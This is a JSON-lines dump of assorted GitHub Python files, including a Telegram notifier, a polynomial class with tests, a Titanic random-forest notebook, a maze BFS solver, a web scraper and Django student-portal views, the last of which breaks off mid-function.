successfullyTransferred = list(set(filenamesToTransfer) - totalFailedFilenames)\n logger.info(\"Fully successfully transferred: {successfullyTransferred}\".format(successfullyTransferred = successfullyTransferred))\n\n # Now we can safely remove all files, because any that have failed have already been copied.\n # Protect from data loss when debugging.\n if parameters[\"debug\"] is False:\n for f in filenamesToTransfer:\n os.remove(os.path.join(parameters[\"receiverData\"], f))\n else:\n logger.debug(\"Files to remove: {filenamesToTransfer}\".format(filenamesToTransfer = filenamesToTransfer))\n\n return (successfullyTransferred, failedFilenames)\n\n","repo_name":"raymondEhlers/OVERWATCH","sub_path":"overwatch/base/dataTransfer.py","file_name":"dataTransfer.py","file_ext":"py","file_size_in_byte":18129,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"130616974","text":"def count(list):\n more=0\n less=0\n\n for i in range(len(list)):\n if len(list[i])>5:\n more=more+1\n else:\n less=less+1\n\n return more,less\nlist =[]\nx=(input(\"How many names you want to enter:\"))\nfor k in range(x):\n list.append((input()))\nmore,less=count(list)\nprint('names more than 5 charchters : {} and Names less than 5 charcters :{}'.format(more,less))\n\n \n","repo_name":"Vipul2504/Python","sub_path":"stringassss.py","file_name":"stringassss.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32959253228","text":"import requests\n\nimport jesse.helpers as jh\nfrom jesse.config import config\n\n\ndef notify(msg):\n \"\"\"\n\n :param msg:\n \"\"\"\n _telegram(msg)\n\n\ndef _telegram(msg):\n token = jh.get_config('env.notifications.telegram_bot_token', '')\n chat_IDs: list = jh.get_config('env.notifications.telegram_chat_IDs', [])\n\n if not token or not len(chat_IDs) or not config['env']['notifications']['enable_notifications']:\n return\n\n for id in chat_IDs:\n requests.get(\n 'https://api.telegram.org/bot{}/sendMessage?chat_id={}&parse_mode=Markdown&text={}'.format(\n token, id, msg\n )\n )\n","repo_name":"dakshvar22/jesse","sub_path":"jesse/services/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"24198619945","text":"\"\"\"Modulo que realiza el reconocimiento de la factura\r\n\"\"\"\r\n\r\n#%%\r\n\r\nimport numpy as np\r\n\r\nimport tensorflow.compat.v2 as tf\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom object_detection.utils import label_map_util, visualization_utils\r\n\r\n#%%\r\n\r\nDIR_MODEL_EXPORTED = 'app/reconocimiento/model'\r\nPATH_TO_SAVED_MODEL = DIR_MODEL_EXPORTED + \"/saved_model\"\r\nLABEL_MAP_FILE = DIR_MODEL_EXPORTED + '/label_map.pbtxt'\r\n\r\n# %%inicializacion en memoria del modelo\r\n\r\ndetect_fn = tf.saved_model.load(PATH_TO_SAVED_MODEL)\r\ncategory_index = label_map_util.create_category_index_from_labelmap(LABEL_MAP_FILE, use_display_name=True)\r\n\r\n\r\n# %% Load saved model and build the detection function\r\n\r\ndef nit_imagen(FILE):\r\n\r\n\r\n # Cargar y preprocesar la imagen\r\n image_np = np.array(plt.imread(FILE))\r\n input_tensor = tf.convert_to_tensor(image_np)\r\n input_tensor = input_tensor[tf.newaxis, ...]\r\n\r\n\r\n # Realizar la deteccion de objetos en la imagen\r\n detections = detect_fn(input_tensor)\r\n\r\n # Extractar las detecciones\r\n num_detections = int(detections.pop('num_detections'))\r\n detections = {key: value[0, :num_detections].numpy()\r\n for key, value in detections.items()}\r\n detections['num_detections'] = num_detections\r\n\r\n # detection_classes should be ints.\r\n detections['detection_classes'] = detections['detection_classes'].astype(np.int64)\r\n\r\n return (category_index[detections['detection_classes'][0]]['name'], detections['detection_scores'][0], FILE)\r\n\r\n\r\n# %%\r\n\r\n# # Visualizar la imagen\r\n\r\n# image_np_with_detections = image_np.copy()\r\n# visualization_utils.visualize_boxes_and_labels_on_image_array(\r\n# image_np_with_detections,\r\n# detections['detection_boxes'],\r\n# detections['detection_classes'],\r\n# detections['detection_scores'],\r\n# category_index,\r\n# use_normalized_coordinates=True,\r\n# max_boxes_to_draw=200,\r\n# min_score_thresh=.15,\r\n# agnostic_mode=False)\r\n\r\n# plt.figure(figsize= (20,10))\r\n# plt.imshow(image_np_with_detections)\r\n# plt.show()\r\n\r\n","repo_name":"hdlopeza/jaco","sub_path":"vision/app_rnn.py","file_name":"app_rnn.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2089485797","text":"#!/usr/bin/env python3\n\nclass Polynomial:\n \"\"\" Class representing polynomial \"\"\"\n def __init__(self,*arg,**kwargs):\n \"\"\" Initialize polynomial object\"\"\"\n self.polynomial = []\n if(len(kwargs) != 0):\n self.polynomial = []\n order = sorted(kwargs.keys())[-1]\n order = int(order[1])\n for i in range(0,int(order)+1):\n self.polynomial.append(0)\n for key,value in kwargs.items():\n index = int(key[1])\n self.polynomial[index] = value \n \n elif(len(arg) != 0):\n if isinstance(arg[0],list):\n self.polynomial = arg[0]\n else:\n self.polynomial = list(arg)\n if self.polynomial[-1] == 0 and len(self.polynomial) != 1: \n self.polynomial.pop()\n \n def __repr__(self):\n \"\"\" representation of objects is the same as the string format of object \"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\" Convert object with polynom represented as list to string \"\"\"\n join_with = {\n (True, True): '-',\n (True, False): '',\n (False, True): ' - ',\n (False, False): ' + '\n }\n\n result = []\n for power, coeff in reversed(list(enumerate(self.polynomial))):\n if coeff == 0:\n continue\n join = join_with[not result, coeff < 0]\n coeff = abs(coeff)\n if coeff == 1 and power != 0:\n coeff = ''\n\n f = {0: '{}{}', 1: '{}{}x'}.get(power, '{}{}x^{}')\n\n result.append(f.format(join, coeff, power))\n\n return ''.join(result) or '0'\n \n def __eq__(self, other): \n \"\"\" compare two polynomial objects in string format \"\"\"\n return self.__str__() == other.__str__()\n \n\n def __add__(self,other):\n \"\"\" add two polynomials \"\"\"\n len_self = len(self.polynomial)\n len_other = len(other.polynomial)\n if len_self >= len_other:\n sum = list(self.polynomial)\n for power,coeff in list(enumerate(other.polynomial)):\n sum[power] = sum[power] + other.polynomial[power]\n else:\n sum = list(other.polynomial)\n for power,coeff in list(enumerate(self.polynomial)):\n sum[power] = sum[power] + self.polynomial[power]\n\n return Polynomial(sum)\n\n def derivative(self):\n \"\"\" takes derivative of a polynomial \"\"\"\n if len(self.polynomial) == 1:\n return Polynomial(0)\n der = [ self.polynomial[i] * i for i in range(1,len(self.polynomial))]\n\n return Polynomial(der)\n\n def at_value(self,value,second_value=''):\n \"\"\" Evalutes polynomial at value using the horner method\"\"\" \n if second_value != '':\n return self.at_value(second_value) - self.at_value(value) \n p = self.polynomial[-1]\n for i in range(len(self.polynomial)-2,-1,-1):\n p = p * value + self.polynomial[i]\n\n return p\n\n def multiply(self,a):\n \"\"\" help method used by __pow__ for multiplying polynomial by itself\"\"\"\n c = [0]*(len(a) + len(self.polynomial)-1)\n\n for i in range(len(a)):\n ai = a[i]\n for j in range(len(self.polynomial)):\n c[i + j] += ai * self.polynomial[j]\n\n return c\n\n def __pow__(self, n):\n \"\"\" raise polynomial to n-th power \"\"\"\n a = [1]\n for i in range(n):\n a = self.multiply(a)\n return Polynomial(a)\n \n\ndef test():\n assert str(Polynomial(0,1,0,-1,4,-2,0,1,3,0)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n assert str(Polynomial([-5,1,0,-1,4,-2,0,1,3,0])) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x - 5\"\n assert str(Polynomial(x7=1, x4=4, x8=3, x9=0, x0=0, x5=-2, x3= -1, x1=1)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n assert str(Polynomial(x2=0)) == \"0\"\n assert str(Polynomial(x0=0)) == \"0\"\n assert Polynomial(x0=2, x1=0, x3=0, x2=3) == Polynomial(2,0,3)\n assert Polynomial(x2=0) == Polynomial(x0=0)\n assert str(Polynomial(x0=1)+Polynomial(x1=1)) == \"x + 1\"\n assert str(Polynomial([-1,1,1,0])+Polynomial(1,-1,1)) == \"2x^2\"\n pol1 = Polynomial(x2=3, x0=1)\n pol2 = Polynomial(x1=1, x3=0)\n assert str(pol1+pol2) == \"3x^2 + x + 1\"\n assert str(pol1+pol2) == \"3x^2 + x + 1\"\n assert str(Polynomial(x0=-1,x1=1)**1) == \"x - 1\"\n assert str(Polynomial(x0=-1,x1=1)**2) == \"x^2 - 2x + 1\" \n pol3 = Polynomial(x0=-1,x1=1)\n assert str(pol3**4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n assert str(pol3**4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n assert str(Polynomial(x0=2).derivative()) == \"0\"\n assert str(Polynomial(x3=2,x1=3,x0=2).derivative()) == \"6x^2 + 3\"\n assert str(Polynomial(x3=2,x1=3,x0=2).derivative().derivative()) == \"12x\"\n pol4 = Polynomial(x3=2,x1=3,x0=2)\n assert str(pol4.derivative()) == \"6x^2 + 3\"\n assert str(pol4.derivative()) == \"6x^2 + 3\"\n assert Polynomial(-2,3,4,-5).at_value(0) == -2\n assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3) == 20\n assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3,5) == 44\n pol5 = Polynomial([1,0,-2])\n assert pol5.at_value(-2.4) == -10.52\n assert pol5.at_value(-2.4) == -10.52\n assert pol5.at_value(-1,3.6) == -23.92\n assert pol5.at_value(-1,3.6) == -23.92\n\nif __name__ == '__main__':\n test()\n","repo_name":"mkosiarc/isj_school","sub_path":"isj_proj05.py","file_name":"isj_proj05.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72023556323","text":"class Node:\n\tdef __init__(self,data):\n\t\tself.data = data\n\t\tself.left = None\n\t\tself.right = None\ndef isoMorphic(n1,n2):\n\tif n1 is None and n2 is None:\n\t\treturn True\n\tif n1 is None or n2 is None:\n\t\treturn False\n\tif n1.data != n2.data :\n\t\treturn False\n\n\treturn (isoMorphic(n1.left,n2.left) and isoMorphic(n1.right,n2.right)) or (isoMorphic(n1.left,n2.right) and isoMorphic(n1.right,n2.left))\t\n\n# Driver program to test above function\nn1 = Node(1)\nn1.left = Node(2)\nn1.right = Node(3)\nn1.left.left = Node(4)\nn1.left.right = Node(5)\nn1.right.left = Node(6)\nn1.left.right.left = Node(7)\nn1.left.right.right = Node(8)\n \nn2 = Node(1)\nn2.left = Node(3)\nn2.right = Node(2)\nn2.right.left = Node(4)\nn2.right.right = Node(5)\nn2.left.right = Node(6)\nn2.right.right.left = Node(8)\nn2.right.right.right = Node(7)\n\nprint(isoMorphic(n1,n2))\n\n\n","repo_name":"damayant/Python","sub_path":"isometric.py","file_name":"isometric.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15694717625","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Random Forest Classifier is used in this Kernel. Dashboard score is 0.78468\n\n# In[262]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nget_ipython().magic(u'matplotlib inline')\nsns.set()\nimport re\n#Sklearn OneHot Encoder to Encode categorical integer features\nfrom sklearn.preprocessing import OneHotEncoder\n#Sklearn train_test_split to split a set on train and test \nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split # for old sklearn version use this to split a dataset \n# Random Forest Classifier from sklearn\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\n\n\n# In[385]:\n\n\n#Import the training data set\ndata = pd.read_csv('../input/train.csv')\ntest = pd.read_csv('../input/test.csv')\ndata.head()\n\n\n# In[386]:\n\n\ndata.isnull().sum()\n\n\n# In[387]:\n\n\ntest.isnull().sum()\n\n\n# In[388]:\n\n\n#Construct an X matrix\nx_train = data[['Name', 'Pclass','Sex','Age','Parch','SibSp','Embarked', 'Fare', 'Cabin', 'Survived']].copy()\nx_test = test[['Name', 'Pclass','Sex','Age','Parch','SibSp','Embarked', 'Fare', 'Cabin']].copy()\nx_train.shape, x_test.shape\n\n\n# In[389]:\n\n\nPassengerID = np.array(test['PassengerId'])\n\n\n# ## Embarked data\n\n# In[390]:\n\n\nprint(x_train.Embarked.unique())\nprint(x_test.Embarked.unique())\nset(x_train.Embarked.unique()) == set(x_test.Embarked.unique()) # CHeck that values in the train and in the test were similar\n\n\n# So, there is a NaN value in the train data, only 2 rows, as we have seen ealier, lets drop them\n\n# In[391]:\n\n\nx_train = x_train.dropna(subset=['Embarked'],axis=0)\n\n\n# In[392]:\n\n\nprint(x_train.Embarked.unique())\nset(x_train.Embarked.unique())==set(x_test.Embarked.unique()) # CHeck that values in the train and in the test were similar\n\n\n# replace these values with (0,1,2)\n\n# In[393]:\n\n\nx_train.Embarked = pd.factorize(x_train.Embarked)[0]\nx_test.Embarked = pd.factorize(x_test.Embarked)[0]\n\n\n# In[394]:\n\n\nx_train.head()\n\n\n# ## Sex data\n\n# There are np missed values so factorize these values (0,1)\n\n# In[395]:\n\n\nx_train.Sex = pd.factorize(x_train.Sex)[0]\nx_test.Sex = pd.factorize(x_test.Sex)[0]\n\n\n# ## Sibsp and Parch data\n# #### We should be carefull with these data to not overfit our model. Lets create a Family feature, which show a size of family, and the feture which show is a passenger alone\n\n# In[396]:\n\n\nx_train['Family'] = x_train['SibSp'] + x_train['Parch']\nx_test['Family'] = x_test['SibSp'] + x_test['Parch']\n\nx_train['Alone'] = x_train['Family'].map(lambda x: 1 if x==0 else 0)\nx_test['Alone'] = x_test['Family'].map(lambda x: 1 if x==0 else 0)\n\n\n# ## Age data\n\n# ### I am going to firstly categorize these data and after make a factorization. But first of all lets define how to categorize the Ages, what intervals will be most efficient, and how to deal with missed values\n\n# In[397]:\n\n\n# Find a mean Age in overall data\nage = pd.concat([x_test.Age, x_train.Age], axis=0)\n\n\n# In[398]:\n\n\nmean = age[1].mean()\n\n\n# In[399]:\n\n\n# Identify the rows with missed Age in special column\nx_train['Missed_Age'] = x_train['Age'].map(lambda x: 1 if pd.isnull(x) else 0)\nx_test['Missed_Age'] = x_test['Age'].map(lambda x: 1 if pd.isnull(x) else 0)\n\n\n# In[400]:\n\n\n# Fill all age values with Age mean\nx_train['Age'] = x_train['Age'].fillna(mean)\nx_test['Age'] = x_test['Age'].fillna(mean)\n\n\n# In[401]:\n\n\ndata[data.Survived==1].Age.plot.hist(alpha=0.5,color='blue',stacked=True, bins=50)\ndata[data.Survived==0].Age.plot.hist(alpha=0.5,color='red', stacked=True, bins=50)\nplt.legend(['Survived','Died'])\nplt.show()\n\n\n# In[402]:\n\n\nsns.countplot(x=\"Survived\", data=data[data['Age'].isnull()])\n\n\n# In[403]:\n\n\nsns.countplot(x=\"Survived\", data=data[data['Age'].isnull()], hue='Pclass')\n\n\n# In[404]:\n\n\ndef process_age(df,cut_points,label_names):\n df[\"Age\"] = pd.cut(df[\"Age\"],cut_points,labels=label_names)\n return df\n\ncut_points = [-1,0,5,16,100] \nlabel_names = [0,1,2,3]\n\nx_train = process_age(x_train,cut_points,label_names)\nx_test = process_age(x_test,cut_points,label_names)\n\n\n# In[405]:\n\n\nset(x_train['Age'].unique()) == set(x_test['Age'].unique())\n\n\n# In[406]:\n\n\nx_train.head()\n\n\n# ## Fare data\n\n# In[407]:\n\n\n# Fill one missed fare in the train set with mean Fare for this class\nx_test.loc[x_test['Fare'].isnull()]['Pclass'] # determine a Class for this passenger\n\n\n# In[408]:\n\n\n# Find the mean Fare for Class 3\nfare_mean = pd.concat([x_train.loc[x_train['Pclass']==3]['Fare'], x_test.loc[x_test['Pclass']==3]['Fare']], axis=0).mean()\n\n\n# In[409]:\n\n\n# Fill the data gap\nx_test['Fare'] = x_test['Fare'].fillna(fare_mean)\n\n\n# In[410]:\n\n\nx_test.isnull().sum()\n\n\n# In[411]:\n\n\nx_train['Fare'] = (x_train['Fare']/20).astype('int64')\nx_test['Fare'] = (x_test['Fare']/20).astype('int64')\n\n\n# In[412]:\n\n\nset(x_train['Fare'].unique()) == set(x_test['Fare'].unique()) # Check the train and test data identity\n\n\n# ## Cabin data\n\n# In[413]:\n\n\n# There a lot of missed values so lets just check do passenger have a Cabin number or not\n\n\n# In[414]:\n\n\nx_train['Missed_Cabin'] = x_train['Cabin'].map(lambda x: 0 if pd.isnull(x) else 1)\nx_test['Missed_Cabin'] = x_test['Cabin'].map(lambda x: 0 if pd.isnull(x) else 1)\n\n\n# Also we can see that some passenger has a few cabins number, lets make a special column, where missed cabin will be zero, \n# and 1,2.... so on the number of cabins\n\n# In[415]:\n\n\nx_train['Cabin_num'] = x_train['Cabin'].map(lambda x: 0 if pd.isnull(x) else len(x.split()))\nx_test['Cabin_num'] = x_test['Cabin'].map(lambda x: 0 if pd.isnull(x) else len(x.split()))\n\n\n# In[416]:\n\n\nx_train.head()\n\n\n# ## Name data\n\n# In[417]:\n\n\n# Lets try to extract a Title data from name using regular expression\nx_train['Title'] = x_train['Name'].map(lambda x: str(re.findall(\"^.*[, *](.*)[.] *\", x)[0]))\nx_test['Title'] = x_test['Name'].map(lambda x: str(re.findall(\"^.*[, ](.*)[.] *\", x)[0]))\n\n\n# In[418]:\n\n\nx_train['Title'].unique()\n\n\n# By the way - Wiki: Count (male) or countess (female) is a title in European countries for a noble of varying status, but historically deemed to convey an approximate rank intermediate between the highest and lowest titles of nobility\n\n# In[419]:\n\n\nsns.countplot(x=\"Title\", data=x_train)\n\n\n# In[420]:\n\n\nx_train.Title = pd.factorize(x_train.Title)[0]\nx_test.Title = pd.factorize(x_test.Title)[0]\n\n\n# In[421]:\n\n\nx_train.head()\n\n\n# Lets also count define length\n\n# In[422]:\n\n\nx_train['Name_Len_char'] = x_train['Name'].map(lambda x: len(x))\nx_train['Name_Len_words'] = x_train['Name'].map(lambda x: len(x.split()))\n\nx_test['Name_Len_char'] = x_test['Name'].map(lambda x: len(x))\nx_test['Name_Len_words'] = x_test['Name'].map(lambda x: len(x.split()))\n\n\n# In[423]:\n\n\nx_train.head()\n\n\n# Create Y-array with SUrvived values\n\n# In[424]:\n\n\n#Create Y array\ny = np.array(x_train[['Survived']])\nprint(y.shape)\n\n\n# Drop Columns which we do not need\n\n# In[425]:\n\n\nx_train=x_train.drop(['SibSp', 'Parch', 'Name', 'Cabin', 'Survived'], axis=1)\nx_test=x_test.drop(['SibSp', 'Parch', 'Name', 'Cabin'],axis=1)\n\n\n# In[426]:\n\n\nx_train.head()\n\n\n# Create Test and Train sets\n\n# In[430]:\n\n\nxn_train, xn_test, yn_train, yn_test = train_test_split(x_train, y, test_size=0.3, random_state=32)\nxn_train.shape, xn_test.shape, yn_train.shape, yn_test.shape\n\n\n# In[431]:\n\n\n# We can optimize the parameters using special function in sclearn, but here I will do it manually\nC=np.array([100,150,200,250,300,350,400,450,500,550,600,650,700,750])\nscores = np.zeros(C.shape)\nfor i in range (len(C)):\n clf = RandomForestClassifier(n_estimators = int(C[i]), max_depth=10, random_state=0, criterion='entropy') \n clf.fit(xn_train, yn_train) \n scores[i] = clf.score(xn_test,yn_test)\n\n\n# In[432]:\n\n\nind = np.unravel_index(np.argmax(scores, axis=None), scores.shape)\nprint('max Score = ',scores[ind],'\\noptimal C = ',C[ind])\n\n\n# In[433]:\n\n\nclf = RandomForestClassifier(n_estimators = 150, max_depth=10, random_state=0, criterion='entropy') \nclf.fit(xn_train, yn_train) \nprint(clf.score(xn_train,yn_train))\nprint(clf.score(xn_test,yn_test))\n\n\n# In[434]:\n\n\nimportance = clf.feature_importances_\n\n\n# In[435]:\n\n\nimportance = pd.DataFrame(importance, index=x_test.columns, \n columns=[\"Importance\"])\n\n\n# In[436]:\n\n\nprint(importance)\n\n\n# In[381]:\n\n\nclf = RandomForestClassifier(n_estimators = 100, max_depth=10, random_state=0, criterion='entropy') \nclf.fit(x_train, y) \nprediction = clf.predict(x_test)\n\n\n# In[382]:\n\n\nprint(clf.score(xn_train,yn_train))\nprint(clf.score(xn_test,yn_test))\nprint(clf.score(x_train,y))\n\n\n# In[383]:\n\n\n# Submit the result\n\nsubmission_df = {\"PassengerId\": PassengerID,\n \"Survived\": prediction}\nsubmission = pd.DataFrame(submission_df)\n\n\n# In[384]:\n\n\nsubmission.to_csv(\"submission.csv\",index=False)\n\n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/fornitroll/random-forest-rev0/random-forest-rev0.py","file_name":"random-forest-rev0.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"13107978652","text":"import unittest\nfrom collections import deque\n\n\ndef solution(A, sr, sc):\n q = deque([])\n q.append((sr, sc, 0))\n visited = [[0] * len(A[0]) for i in range(len(A))]\n dr = [0, 1, 0, -1]\n dc = [1, 0, -1, 0]\n\n while q:\n r, c, lvl = q.popleft()\n\n if A[r][c] == 'E':\n return lvl\n\n visited[r][c] = 1\n examine_neighbors(A, visited, q, r, c, lvl, dr, dc)\n\n return -1\n\n\ndef examine_neighbors(A, visited, q, r, c, lvl, dr, dc):\n for i in range(len(dr)):\n new_r = r + dr[i]\n new_c = c + dc[i]\n\n if new_r < 0 or new_r >= len(A) or new_c < 0 or new_c >= len(A[0]) or A[new_r][new_c] == '#' or visited[new_r][new_c]:\n continue\n\n q.append((new_r, new_c, lvl + 1))\n\n\nclass Test(unittest.TestCase):\n def test_solution(self):\n grid = [['.', '.', '.', '#', '.', '.', '.'],\n ['.', '#', '.', '.', '.', '#', '.'],\n ['.', '#', '.', '.', '.', '.', '.'],\n ['.', '.', '#', '#', '.', '.', '.'],\n ['#', '.', '#', 'E', '.', '#', '.']]\n\n self.assertEqual(9, solution(grid, 0, 0),\n \"Should return correct shortest steps escape the maze\")\n\n grid = [['.', '.', '.', '#', '.', '.', '.'],\n ['.', '#', '.', '.', '.', '#', '.'],\n ['.', '#', '.', '.', '.', '.', '.'],\n ['.', '.', '#', '#', '#', '.', '.'],\n ['#', '.', '#', 'E', '.', '#', '.']]\n\n self.assertEqual(-1, solution(grid, 0, 0),\n \"Should return -1 if there is no way to escape the maze\")","repo_name":"DKNY1201/programming-python","sub_path":"DFS-BFS/ShortestStepsToReachEscapeMaze.py","file_name":"ShortestStepsToReachEscapeMaze.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73416042723","text":"import requests\nimport json\nimport csv\nfrom bs4 import BeautifulSoup\n\ncountries = []\nurl = \"https://www.womenonwaves.org/en/map/country\"\nr = requests.get(url)\n\nsoup = BeautifulSoup(r.text, \"html.parser\")\n\nfor country in soup.find_all(\"div\", class_=\"list-item-country\"):\n country_obj = {}\n link = country.find(\"a\")\n country_obj['name'] = link.get_text().strip()\n country_obj['link'] = link.get(\"href\")\n country_obj['color'] = link.get(\"style\")\n if country_obj['color']:\n country_obj['color'] = country_obj['color'].split(\":\")[1].strip()\n countries.append(country_obj)\n\ncount = 0\nwith open('countries.csv', 'w') as csv_file:\n csv_writer = csv.writer(csv_file)\n for country in countries:\n if count == 0:\n csv_writer.writerow(country)\n count += 1\n csv_writer.writerow(country.values())\n \nprint(json.dumps(countries, indent=2))\n","repo_name":"yuletide/womenonwaves_map","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18061126827","text":"from zope.interface import implements\nfrom repoze.bfg.security import (\n Everyone,\n Allow,\n Deny,\n ALL_PERMISSIONS,\n)\nfrom bda.bfg.app.model import (\n AdapterNode,\n Properties,\n BaseMetadata,\n BaseNodeInfo,\n registerNodeInfo,\n)\nfrom bda.bfg.ugm.model.interfaces import IUser\n\nclass User(AdapterNode):\n \n implements(IUser)\n \n node_info_name = 'user'\n \n __acl__ = [\n (Allow, 'group:authenticated', 'view'),\n (Allow, 'group:authenticated', 'edit'),\n (Allow, Everyone, 'login'),\n (Deny, Everyone, ALL_PERMISSIONS),\n ]\n \n @property\n def properties(self):\n props = Properties()\n props.editable = True\n return props\n \n @property\n def metadata(self):\n metadata = BaseMetadata()\n metadata.title = \"User\"\n metadata.description = \"User\"\n return metadata\n \n def __call__(self):\n self.model()\n\ninfo = BaseNodeInfo()\ninfo.title = 'User'\ninfo.description = 'User'\ninfo.node = User\ninfo.addables = []\nregisterNodeInfo('user', info)","repo_name":"bluedynamics/bda.bfg.ugm","sub_path":"src/bda/bfg/ugm/model/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5143007015","text":"import yaml\nimport json\n\n'''\n:return\n'''\ndef read_json_to_dict(path)->dict:\n with open(path,encoding=\"utf-8\") as f:\n return json.load(f) # 返回的就是字典\n\ndef read_yaml_to_dict(path)->dict:\n with open(path,encoding=\"utf-8\") as f:\n return yaml.full_load(f)\n\ndef json_to_yaml(path):\n with open(path,encoding=\"utf-8\") as f:\n y=yaml.dump(json.load(f)) # 返回的是yaml\n print(\"yaml.dump(json.load(f)) type:\",type(y))\n return y\n\n\n\nif __name__==\"__main__\":\n js_path=\"../data/read_file_test/test_json.json\"\n yaml_path=\"../data/read_file_test/pmf.yaml\"\n print(\"Json To Dict: \",read_json_to_dict(js_path))\n print(\"YAML To Dict: \",read_yaml_to_dict(yaml_path))\n print(\"Json TO Yaml: \",json_to_yaml(js_path))\n","repo_name":"colagold/DataAnalysisAndVisualization","sub_path":"process/json_yaml_dict.py","file_name":"json_yaml_dict.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10540666801","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom . forms import UserRegistrationForm, VoteForm\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date\nfrom datetime import datetime\nfrom django.contrib.auth import authenticate, login\nfrom .models import OtherRequests, UserInfo, AvailableCourses, Enrollment, Fees, Voting, UserVotes\nfrom posts.models import Post, PostLikes, Comments\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nimport random\nfrom django.core.paginator import Paginator\n\n\n# Create your views here.\n\ndef register(request):\n \n if request.user.is_authenticated:\n return redirect('dashboard')\n\n form = UserRegistrationForm()\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST) \n\n if form.is_valid():\n username = form.cleaned_data.get('username')\n\n\n new_user = form.save()\n\n new_user = authenticate(username=form.cleaned_data['username'],\n password=form.cleaned_data['password1'],\n )\n login(request, new_user)\n \n degree_title = ['bscs', 'bba', 'bms', 'bfd']\n\n student_degree_title = random.choice(degree_title)\n \n user_model = User.objects.get(username=username)\n\n new_profile = UserInfo.objects.create(user=user_model, degree_title=student_degree_title)\n new_profile.save()\n\n\n\n new_user_fees = Fees.objects.create(user=user_model, enrollment_fees=5000, monthly_fees = 2000, balance=7000)\n new_user_fees.save()\n \n messages.success(request, f\"Account created for {username}\")\n\n return redirect('dashboard')\n \n else:\n form = UserRegistrationForm()\n messages.warning(request, f'Please enter the correct information')\n return render(request, 'users/register.html', {'form': form })\n \n return render(request, 'users/register.html', {'form': form })\n\n@login_required(login_url='student_login')\ndef dashboard(request):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n\n\n fees_object = Fees.objects.get(user=request.user)\n likes = PostLikes.objects.filter(user=request.user)\n comments = Comments.objects.all()\n\n p = Paginator(Post.objects.all().order_by('-id'), 8)\n page = request.GET.get('page')\n posts = p.get_page(page)\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n return render(request, 'users/dashboard.html', {'today':today, 'current_time': current_time, \n 'user_profile':user_profile, 'fees_object':fees_object, 'posts':posts, 'likes':likes,\n 'comments':comments,})\n\n@login_required(login_url='student_login')\ndef request(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n\n\n if request.method == 'POST':\n\n username = request.POST['username']\n subject = request.POST['subject']\n content = request.POST['content']\n\n new_request = OtherRequests.objects.create(user= username, subject=subject, content=content)\n new_request.save()\n\n\n\n messages.success(request, f\"Your request has been sent!\")\n return redirect('request')\n \n\n \n return render(request, 'users/request.html', {'user_profile': user_profile, 'today':today, 'current_time': current_time})\n\n\n@login_required(login_url='student_login')\ndef view_requests(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n\n\n current_user = request.user\n\n current_user_object = OtherRequests.objects.filter(user=current_user).order_by('-id')\n \n\n\n return render(request, 'users/view_requests.html', {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'current_user_object': current_user_object})\n\n\n\n\n\n@login_required(login_url='student_login')\ndef profile(request, u):\n user_profile = 